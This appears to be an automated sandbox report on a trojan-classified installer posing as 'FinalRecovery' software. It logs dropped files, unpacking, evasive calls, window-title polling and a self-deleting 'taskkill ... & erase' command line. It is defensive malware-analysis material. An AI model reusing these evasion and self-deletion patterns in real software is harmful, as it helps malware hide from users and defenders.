Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0042AB1A	2_2_0042AB1A
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0040CBC0	2_2_0040CBC0
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00421C08	2_2_00421C08
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0042AC3A	2_2_0042AC3A
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00428CB9	2_2_00428CB9
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00447D2D	2_2_00447D2D
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404F20	2_2_00404F20
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_1000E111	2_2_1000E111
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_1000FAC0	2_2_1000FAC0

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: String function: 10003100 appears 34 times
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: String function: 0040F960 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00405964 appears 108 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00403400 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00406AA4 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 0044540C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 004456DC appears 59 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 004526A4 appears 91 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00433B14 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00456D64 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 004078D4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00456B58 appears 93 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00403494 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00408BEC appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00403684 appears 218 times

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0042F178 NtdllDefWindowProc_A,	1_2_0042F178
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00423B6C NtdllDefWindowProc_A,	1_2_00423B6C
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004563D8 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,	1_2_004563D8
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004125C0 NtdllDefWindowProc_A,	1_2_004125C0
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004771E0 NtdllDefWindowProc_A,	1_2_004771E0

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_0042E780: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

1_2_0042E780

Source: file.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: is-U89TP.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-U89TP.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-U89TP.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: is-U89TP.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-U89TP.tmp.1.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped

Source: file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy) 233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730

Source: finalrecovery.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: _RegDLL.tmp.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"	Jump to behavior
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe	Jump to behavior
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409420
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00454800 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_00454800

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "finalrecovery.exe")

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.troj.evad.winEXE@12/24@0/4

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

2_2_00401B40

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_00455028 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,

1_2_00455028

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

2_2_00402C00

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,

2_2_00405350

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_01

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00409BC4 FindResourceA,SizeofResource,LoadResource,LockResource,

0_2_00409BC4

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

File created: C:\Program Files (x86)\FgasoftFR

Jump to behavior

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Command line argument: `a}{	2_2_00409670
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Command line argument: MFE.	2_2_00409670
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Command line argument: ZK]Z	2_2_00409670
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Command line argument: ZK]Z	2_2_00409670

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 1782938 > 1048576

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Unpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack

Detected unpacking (changes PE section rights)

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Unpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.fga20:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Obfuscated command line found

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406590 push 004065CDh; ret	0_2_004065C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004080DC push ecx; mov dword ptr [esp], eax	0_2_004080E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004040B5 push eax; ret	0_2_004040F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404185 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404206 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C218 push eax; ret	0_2_0040C219
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004042E8 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404283 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408F10 push 00408F43h; ret	0_2_00408F3B
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040992C push 00409969h; ret	1_2_00409961
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040A027 push ds; ret	1_2_0040A028
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00476228 push ecx; mov dword ptr [esp], edx	1_2_00476229
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax	1_2_004062CD
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045866C push 004586B0h; ret	1_2_004586A8
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004106B8 push ecx; mov dword ptr [esp], edx	1_2_004106BD
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040A77C push C00040C3h; ret	1_2_0040A781
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00412910 push 00412973h; ret	1_2_0041296B
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00442A78 push ecx; mov dword ptr [esp], ecx	1_2_00442A7C
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00450B58 push 00450B8Bh; ret	1_2_00450B83
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00450D1C push ecx; mov dword ptr [esp], eax	1_2_00450D21
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00456E00 push 00456E38h; ret	1_2_00456E30
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00492EC8 push ecx; mov dword ptr [esp], ecx	1_2_00492ECD
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040D010 push ecx; mov dword ptr [esp], edx	1_2_0040D012
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045F0C0 push ecx; mov dword ptr [esp], ecx	1_2_0045F0C4
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040546D push eax; ret	1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040F570 push ecx; mov dword ptr [esp], edx	1_2_0040F572
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00483538 push ecx; mov dword ptr [esp], ecx	1_2_0048353D
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040553D push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004055BE push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040563B push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004056A0 push 00405749h; ret	1_2_00405741

Source: finalrecovery.exe.1.dr

Static PE information: section name: .fga20

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0044AC90

Source: initial sample

Static PE information: section name: .text entropy: 7.328115312515883

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Jump to dropped file
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-U89TP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_iscrypt.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00423BF4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423BF4
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00423BF4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423BF4
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0042417C IsIconic,SetActiveWindow,	1_2_0042417C
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004241C4 IsIconic,SetActiveWindow,SetFocus,	1_2_004241C4
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0041836C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	1_2_0041836C
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00422844 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	1_2_00422844
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00417580 IsIconic,GetCapture,	1_2_00417580
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00481878 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,	1_2_00481878
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00417CB6 IsIconic,SetWindowPos,	1_2_00417CB6
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00417CB8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	1_2_00417CB8

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

1_2_0044AC90

Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_0-5775

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-U89TP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_shfoldr.dll	Jump to dropped file

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_2-35635

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,

2_2_004056A0

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00409B08 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

0_2_00409B08

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00473B80 FindFirstFileA,FindNextFileA,FindClose,	1_2_00473B80
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00451DC0 FindFirstFileA,GetLastError,	1_2_00451DC0
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004963A0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	1_2_004963A0
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00463080 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00463080
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004634FC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_004634FC
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00461AF4 FindFirstFileA,FindNextFileA,FindClose,	1_2_00461AF4
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,	2_2_00404490
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00423DAD FindFirstFileExW,	2_2_00423DAD
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10007E39 FindFirstFileExW,	2_2_10007E39

